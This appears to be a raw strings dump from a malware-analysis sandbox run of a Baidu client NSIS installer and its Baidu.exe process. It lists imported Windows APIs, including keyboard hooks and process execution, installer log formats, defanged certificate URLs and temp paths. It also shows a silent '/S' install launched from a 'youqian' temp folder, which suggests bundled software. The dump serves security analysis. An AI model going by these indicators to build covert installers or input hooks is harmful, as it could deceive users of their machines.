GetCPInfo
GetCPInfo
GetWindowsDirectoryA
GetWindowsDirectoryA
WinExec
WinExec
GetProcessHeap
GetProcessHeap
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
GetViewportExtEx
GetViewportExtEx
GetViewportOrgEx
GetViewportOrgEx
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
ShellExecuteA
ShellExecuteA
GetKeyboardLayout
GetKeyboardLayout
GetKeyState
GetKeyState
SetWindowsHookExA
SetWindowsHookExA
UnhookWindowsHookEx
UnhookWindowsHookEx
CreateDialogIndirectParamA
CreateDialogIndirectParamA
.text
.text
.rdata
.rdata
@.data
@.data
.rsrc
.rsrc
(*.*)
(*.*)
Baidu_Setup_1.6.200.359_ftn_1050103060.exe_1308:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
@.reloc
@.reloc
RegDeleteKeyExW
RegDeleteKeyExW
Kernel32.DLL
Kernel32.DLL
PSAPI.DLL
PSAPI.DLL
%s=%s
%s=%s
GetWindowsDirectoryW
GetWindowsDirectoryW
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
GetAsyncKeyState
GetAsyncKeyState
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationW
SHFileOperationW
ShellExecuteW
ShellExecuteW
SHELL32.dll
SHELL32.dll
RegDeleteKeyW
RegDeleteKeyW
RegCloseKey
RegCloseKey
RegEnumKeyW
RegEnumKeyW
RegOpenKeyExW
RegOpenKeyExW
RegCreateKeyExW
RegCreateKeyExW
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
uKeY
uKeY
) %s#
) %s#
OZ.nfwV
OZ.nfwV
5m6c6
5m6c6
8$8@8_8~8
8$8@8_8~8
= =)=4=;=
= =)=4=;=
6o6s6z6
6o6s6z6
6)646*959
6)646*959
3"4'4.434:4?4
3"4'4.434:4?4
0 0(050
0 0(050
7%7s7
7%7s7
4 4$4(4,404
4 4$4(4,404
; ;$;(;3;
; ;$;(;3;
7 7$7(7,707
7 7$7(7,707
5 5$5(5,505
5 5$5(5,505
: :$:(:,:
: :$:(:,:
; ;$;,;@;`;
; ;$;,;@;`;
Nullsoft Install System v2.46.5-Unicode
Nullsoft Install System v2.46.5-Unicode
logging set to %d
logging set to %d
settings logging to %d
settings logging to %d
created uninstaller: %d, "%s"
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")
Exec: failed createprocess ("%s")
Exec: success ("%s")
Exec: success ("%s")
Exec: command="%s"
Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
Exch: stack
Exch: stack
RMDir: "%s"
RMDir: "%s"
MessageBox: %d,"%s"
MessageBox: %d,"%s"
Delete: "%s"
Delete: "%s"
File: wrote %d to "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename failed: %s
Rename on reboot: %s
Rename on reboot: %s
Rename: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
SetFileAttributes: "%s":X
Sleep(%d)
Sleep(%d)
detailprint: %s
detailprint: %s
Call: %d
Call: %d
Aborting: "%s"
Aborting: "%s"
Jump: %d
Jump: %d
verifying installer: %d%%
verifying installer: %d%%
unpacking data: %d%%
unpacking data: %d%%
... %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
~nsu.tmp
install.log
install.log
%u.%u%s%s
%u.%u%s%s
Skipping section: "%s"
Skipping section: "%s"
Section: "%s"
Section: "%s"
New install of "%s" to "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
*?|/":
*?|/":
invalid registry key
invalid registry key
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
x%c
x%c
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory invalid input("%s")
RMDir: RemoveDirectory invalid input("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile("%s")
Delete: DeleteFile("%s")
%s: failed opening file "%s"
%s: failed opening file "%s"
S~1\Temp\nsq3.tmp\InstallHelper.dll
S~1\Temp\nsq3.tmp\InstallHelper.dll
\msvcr80.dll
\msvcr80.dll
80.CRT.manifest
80.CRT.manifest
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq3.tmp\InstallHelper.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq3.tmp\InstallHelper.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq3.tmp
nsq3.tmp
nsq3.tmp
File: wrote 802816 to "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq3.tmp\InstallHelper.dll"
File: wrote 802816 to "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq3.tmp\InstallHelper.dll"
nsq3.tmp\InstallHelper.dll"
nsq3.tmp\InstallHelper.dll"
1.6.200.359
1.6.200.359
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq3.tmp
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq3.tmp
D:\dream\Baidu_Setup_1.6.200.359_ftn_1050103060.exe
D:\dream\Baidu_Setup_1.6.200.359_ftn_1050103060.exe
%WinDir%\Temp\baidu\youqian
%WinDir%\Temp\baidu\youqian
%WinDir%\Temp\baidu\youqian\
%WinDir%\Temp\baidu\youqian\
Microsoft.VC80.CRT
Microsoft.VC80.CRT
D:\dream
D:\dream
Baidu_Setup_1.6.200.359_ftn_1050103060.exe
Baidu_Setup_1.6.200.359_ftn_1050103060.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv1.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
1.6.200.359
1.6.200.359
Baidu_Setup_1.6.200.359_ftn_1050103060.exe_492:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
@.reloc
@.reloc
RegDeleteKeyExW
RegDeleteKeyExW
Kernel32.DLL
Kernel32.DLL
PSAPI.DLL
PSAPI.DLL
%s=%s
%s=%s
GetWindowsDirectoryW
GetWindowsDirectoryW
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
GetAsyncKeyState
GetAsyncKeyState
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationW
SHFileOperationW
ShellExecuteW
ShellExecuteW
SHELL32.dll
SHELL32.dll
RegDeleteKeyW
RegDeleteKeyW
RegCloseKey
RegCloseKey
RegEnumKeyW
RegEnumKeyW
RegOpenKeyExW
RegOpenKeyExW
RegCreateKeyExW
RegCreateKeyExW
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
>ÌW
>ÌW
s.Zn|
s.Zn|
Thawte Certification1
Thawte Certification1
hXXp://ocsp.thawte.com0
hXXp://ocsp.thawte.com0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
&hXXps://VVV.globalsign.com/repository/03
&hXXps://VVV.globalsign.com/repository/03
"hXXp://crl.globalsign.net/root.crl0
"hXXp://crl.globalsign.net/root.crl0
hXXp://ts-ocsp.ws.symantec.com07
hXXp://ts-ocsp.ws.symantec.com07
hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0
hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0
hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
&hXXps://VVV.globalsign.com/repository/0
&hXXps://VVV.globalsign.com/repository/0
-hXXp://crl.globalsign.com/gs/gscodesigng2.crl0
-hXXp://crl.globalsign.com/gs/gscodesigng2.crl0
4hXXp://secure.globalsign.com/cacert/gscodesigng2.crt04
4hXXp://secure.globalsign.com/cacert/gscodesigng2.crt04
(hXXp://ocsp2.globalsign.com/gscodesigng20
(hXXp://ocsp2.globalsign.com/gscodesigng20
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
hXXp://mini.baidu.com 0
hXXp://mini.baidu.com 0
System.dll
System.dll
2Beijing baidu Netcom science and technology co.ltd1>0
2Beijing baidu Netcom science and technology co.ltd1>0
2Beijing baidu Netcom science and technology co.ltd0
2Beijing baidu Netcom science and technology co.ltd0
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXps://VVV.verisign.com/rpa0
hXXps://VVV.verisign.com/rpa0
hXXp://ocsp.verisign.com0;
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
hXXps://VVV.verisign.com/cps0*
hXXps://VVV.verisign.com/cps0*
#hXXp://logo.verisign.com/vslogo.gif04
#hXXp://logo.verisign.com/vslogo.gif04
#hXXp://crl.verisign.com/pca3-g5.crl04
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://ocsp.verisign.com0
hXXp://ocsp.verisign.com0
K7.cX?
K7.cX?
>>>.AAA
>>>.AAA
Nullsoft Install System v2.46.5-Unicode
Nullsoft Install System v2.46.5-Unicode
logging set to %d
logging set to %d
settings logging to %d
settings logging to %d
created uninstaller: %d, "%s"
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")
Exec: failed createprocess ("%s")
Exec: success ("%s")
Exec: success ("%s")
Exec: command="%s"
Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
Exch: stack
Exch: stack
RMDir: "%s"
RMDir: "%s"
MessageBox: %d,"%s"
MessageBox: %d,"%s"
Delete: "%s"
Delete: "%s"
File: wrote %d to "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename failed: %s
Rename on reboot: %s
Rename on reboot: %s
Rename: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
SetFileAttributes: "%s":X
Sleep(%d)
Sleep(%d)
detailprint: %s
detailprint: %s
Call: %d
Call: %d
Aborting: "%s"
Aborting: "%s"
Jump: %d
Jump: %d
verifying installer: %d%%
verifying installer: %d%%
unpacking data: %d%%
unpacking data: %d%%
... %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
~nsu.tmp
install.log
install.log
%u.%u%s%s
%u.%u%s%s
Skipping section: "%s"
Skipping section: "%s"
Section: "%s"
Section: "%s"
New install of "%s" to "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
*?|/":
*?|/":
invalid registry key
invalid registry key
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
x%c
x%c
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory invalid input("%s")
RMDir: RemoveDirectory invalid input("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile("%s")
Delete: DeleteFile("%s")
%s: failed opening file "%s"
%s: failed opening file "%s"
1\"%CurrentUserName%"\LOCALS~1\Temp\nsr6.tmp\InstallHelper.dll
1\"%CurrentUserName%"\LOCALS~1\Temp\nsr6.tmp\InstallHelper.dll
lient\1.6.200.359\Baidu.exe" -i 2#"%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359" -p 3
lient\1.6.200.359\Baidu.exe" -i 2#"%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359" -p 3
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr6.tmp\InstallHelper.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr6.tmp\InstallHelper.dll
Poicy\{73F970DA-48AC-43F1-9848-FB90504CE3E9}
Poicy\{73F970DA-48AC-43F1-9848-FB90504CE3E9}
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr6.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr6.tmp
aidu\BaiduClient\1.6.200.359
aidu\BaiduClient\1.6.200.359
\Baidu.exe" -noclient
\Baidu.exe" -noclient
ient\1.6.200.359
ient\1.6.200.359
callback%d
callback%d
kernel32.dll
kernel32.dll
nsr6.tmp
nsr6.tmp
File: skipped: "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr6.tmp\InstallHelper.dll" (overwriteflag=1)
File: skipped: "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr6.tmp\InstallHelper.dll" (overwriteflag=1)
stallHelper.dll"
stallHelper.dll"
:\Documents and Settings\"%CurrentUserName%"\AppData\Local\Baidu\BaiduClient\1.6.200.359" -p 3")
:\Documents and Settings\"%CurrentUserName%"\AppData\Local\Baidu\BaiduClient\1.6.200.359" -p 3")
\Local\Baidu\BaiduClient\1.6.200.359"
\Local\Baidu\BaiduClient\1.6.200.359"
ient\1.6.200.359\BDClientProxy.dll
ient\1.6.200.359\BDClientProxy.dll
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359" -p 3
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359" -p 3
1050103060
1050103060
.200.359_ftn_1050103060.exe
.200.359_ftn_1050103060.exe
\WINDOWS\Temp\baidu\youqian\
\WINDOWS\Temp\baidu\youqian\
\Baidu_Setup_1.6.200.359_ftn_1050103060.exe" /S
\Baidu_Setup_1.6.200.359_ftn_1050103060.exe" /S
0103060
0103060
050103060.exe
050103060.exe
"%WinDir%\Temp\baidu\youqian\
"%WinDir%\Temp\baidu\youqian\
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359
yinyue\1.0.0.0
yinyue\1.0.0.0
1.0.0.2
1.0.0.2
%WinDir%\Temp\baidu\youqian\
%WinDir%\Temp\baidu\youqian\
Baidu_Setup_1.6.200.359_ftn_1050103060.exe
Baidu_Setup_1.6.200.359_ftn_1050103060.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr4.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr4.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
\Baidu_Setup_1.6.200.359_ftn_1050103060.exe
\Baidu_Setup_1.6.200.359_ftn_1050103060.exe
%Documents and Settings%\%current user%\Desktop
%Documents and Settings%\%current user%\Desktop
%Documents and Settings%\%current user%\Start Menu\Programs
%Documents and Settings%\%current user%\Start Menu\Programs
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient
%Documents and Settings%\All Users
%Documents and Settings%\All Users
%Documents and Settings%\All Users\Application Data
%Documents and Settings%\All Users\Application Data
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Application Data
1.6.200.359
1.6.200.359
Baidu.exe_808:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
Base.dll
Base.dll
Utils.dll
Utils.dll
WS2_32.dll
WS2_32.dll
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag
unsupported version
unsupported version
asio.misc
asio.misc
asio.misc error
asio.misc error
thread.entry_event
thread.entry_event
thread.exit_event
thread.exit_event
E:\MiniBaidu\Basic\Include\CommonInclude\Base/Process/IPCMessager.h
E:\MiniBaidu\Basic\Include\CommonInclude\Base/Process/IPCMessager.h
E:\MiniBaidu\Basic\Include\CommonInclude\Base/Process/ChildProcess.h
E:\MiniBaidu\Basic\Include\CommonInclude\Base/Process/ChildProcess.h
CChildProcess::HandleMsg() invalid message id.
CChildProcess::HandleMsg() invalid message id.
Base::Process::CChildProcess::HandleMsg
Base::Process::CChildProcess::HandleMsg
BrowserProcess.cpp
BrowserProcess.cpp
NeedInstallNewVersion:%d
NeedInstallNewVersion:%d
DecodeMsgContent() serialization error
DecodeMsgContent() serialization error
DecodeMsgContent
DecodeMsgContent
E:\MiniBaidu\Basic\Include\CommonInclude\Base/Process/IPCMessageDef.h
E:\MiniBaidu\Basic\Include\CommonInclude\Base/Process/IPCMessageDef.h
E:\MiniBaidu\minibaidu_stable_proj\Include\boost/exception/detail/exception_ptr.hpp
E:\MiniBaidu\minibaidu_stable_proj\Include\boost/exception/detail/exception_ptr.hpp
EncodeMsgContent() serialization error
EncodeMsgContent() serialization error
EncodeMsgContent
EncodeMsgContent
BrowserShell.cpp
BrowserShell.cpp
Heartbeat.dll
Heartbeat.dll
BDMSkin.dll
BDMSkin.dll
Skins\CommonRes.rdb
Skins\CommonRes.rdb
UIHandler.dll
UIHandler.dll
BrowserFrame.dll
BrowserFrame.dll
C:\Windows\System32\riched20.dll
C:\Windows\System32\riched20.dll
e:\minibaidu\minibaidu_client_proj\source\brbrowser\AppPrefetcher.h
e:\minibaidu\minibaidu_client_proj\source\brbrowser\AppPrefetcher.h
open file error: %x
open file error: %x
BrowserShellMain.cpp
BrowserShellMain.cpp
CommonWorkerProcess.cpp
CommonWorkerProcess.cpp
CCommonWorkerProcess::HandleMsg Fail to handle %d message.
CCommonWorkerProcess::HandleMsg Fail to handle %d message.
CCommonWorkerProcess::HandleMsg
CCommonWorkerProcess::HandleMsg
CCommonWorkerProcess::GetInstance Fail to get %d instance
CCommonWorkerProcess::GetInstance Fail to get %d instance
Report %d data
Report %d data
CCommonWorkerProcess::HandleReportJob
CCommonWorkerProcess::HandleReportJob
CCommonWorkerProcess::HandleReportJob Fail to handle %d message
CCommonWorkerProcess::HandleReportJob Fail to handle %d message
GetReportMgr
GetReportMgr
ReleaseReportMgr
ReleaseReportMgr
CCommonWorkerProcess::HandleProtocolJob Fail to handle %d message
CCommonWorkerProcess::HandleProtocolJob Fail to handle %d message
boost thread: trying joining itself
boost thread: trying joining itself
E:\MiniBaidu\Basic\Include\CommonInclude\Base/Process/AsyncTask.h
E:\MiniBaidu\Basic\Include\CommonInclude\Base/Process/AsyncTask.h
PluginMgrProcess.cpp
PluginMgrProcess.cpp
RendererProcess.cpp
RendererProcess.cpp
E:\MiniBaidu\Basic\Output\BinRelease\Baidu.pdb
E:\MiniBaidu\Basic\Output\BinRelease\Baidu.pdb
?QueryKeyValue@Register@Base@@YAHPAUHKEY__@@PB_W1PA_WPAK@Z
?QueryKeyValue@Register@Base@@YAHPAUHKEY__@@PB_W1PA_WPAK@Z
Report.dll
Report.dll
MSVCP100.dll
MSVCP100.dll
MSVCR100.dll
MSVCR100.dll
_amsg_exit
_amsg_exit
_acmdln
_acmdln
_crt_debugger_hook
_crt_debugger_hook
GetProcessHeap
GetProcessHeap
CreateIoCompletionPort
CreateIoCompletionPort
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCreateKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
ShellExecuteW
ShellExecuteW
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
WINMM.dll
WINMM.dll
.?AV?$singleton_wrapper@V?$extended_type_info_typeid@USLaunchDone@ControlMsg@@@serialization@boost@@@detail@serialization@boost@@
.?AV?$singleton_wrapper@V?$extended_type_info_typeid@USLaunchDone@ControlMsg@@@serialization@boost@@@detail@serialization@boost@@
.?AV?$singleton@V?$extended_type_info_typeid@USLaunchDone@ControlMsg@@@serialization@boost@@@serialization@boost@@
.?AV?$singleton@V?$extended_type_info_typeid@USLaunchDone@ControlMsg@@@serialization@boost@@@serialization@boost@@
.?AV?$extended_type_info_typeid@USLaunchDone@ControlMsg@@@serialization@boost@@
.?AV?$extended_type_info_typeid@USLaunchDone@ControlMsg@@@serialization@boost@@
.?AV?$singleton_wrapper@V?$iserializer@Vbinary_iarchive@archive@boost@@USLaunchDone@ControlMsg@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$singleton_wrapper@V?$iserializer@Vbinary_iarchive@archive@boost@@USLaunchDone@ControlMsg@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$iserializer@Vbinary_iarchive@archive@boost@@USLaunchDone@ControlMsg@@@detail@archive@boost@@
.?AV?$iserializer@Vbinary_iarchive@archive@boost@@USLaunchDone@ControlMsg@@@detail@archive@boost@@
.?AV?$singleton_wrapper@V?$extended_type_info_typeid@USRunDone@ControlMsg@@@serialization@boost@@@detail@serialization@boost@@
.?AV?$singleton_wrapper@V?$extended_type_info_typeid@USRunDone@ControlMsg@@@serialization@boost@@@detail@serialization@boost@@
.?AV?$singleton@V?$extended_type_info_typeid@USRunDone@ControlMsg@@@serialization@boost@@@serialization@boost@@
.?AV?$singleton@V?$extended_type_info_typeid@USRunDone@ControlMsg@@@serialization@boost@@@serialization@boost@@
.?AV?$extended_type_info_typeid@USRunDone@ControlMsg@@@serialization@boost@@
.?AV?$extended_type_info_typeid@USRunDone@ControlMsg@@@serialization@boost@@
.?AV?$oserializer@Vbinary_oarchive@archive@boost@@USRunDone@ControlMsg@@@detail@archive@boost@@
.?AV?$oserializer@Vbinary_oarchive@archive@boost@@USRunDone@ControlMsg@@@detail@archive@boost@@
.?AV?$singleton_wrapper@V?$oserializer@Vbinary_oarchive@archive@boost@@USRunDone@ControlMsg@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$singleton_wrapper@V?$oserializer@Vbinary_oarchive@archive@boost@@USRunDone@ControlMsg@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$oserializer@Vbinary_oarchive@archive@boost@@USLaunchDone@ControlMsg@@@detail@archive@boost@@
.?AV?$oserializer@Vbinary_oarchive@archive@boost@@USLaunchDone@ControlMsg@@@detail@archive@boost@@
.?AV?$singleton_wrapper@V?$oserializer@Vbinary_oarchive@archive@boost@@USLaunchDone@ControlMsg@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$singleton_wrapper@V?$oserializer@Vbinary_oarchive@archive@boost@@USLaunchDone@ControlMsg@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$bind_t@_NV?$mf1@_NVCChildProcess@Process@Base@@ABUSIPCMsg@IPCMessager@3@@_mfi@boost@@V?$list2@V?$value@V?$shared_ptr@VCChildProcess@Process@Base@@@boost@@@_bi@boost@@U?$arg@$00@3@@_bi@3@@_bi@boost@@
.?AV?$bind_t@_NV?$mf1@_NVCChildProcess@Process@Base@@ABUSIPCMsg@IPCMessager@3@@_mfi@boost@@V?$list2@V?$value@V?$shared_ptr@VCChildProcess@Process@Base@@@boost@@@_bi@boost@@U?$arg@$00@3@@_bi@3@@_bi@boost@@
.?AUSLaunchDone@ControlMsg@@
.?AUSLaunchDone@ControlMsg@@
.?AUSRunDone@ControlMsg@@
.?AUSRunDone@ControlMsg@@
.?AV?$singleton_wrapper@V?$extended_type_info_typeid@USHostLoginNotification@CommonServiceMsg@@@serialization@boost@@@detail@serialization@boost@@
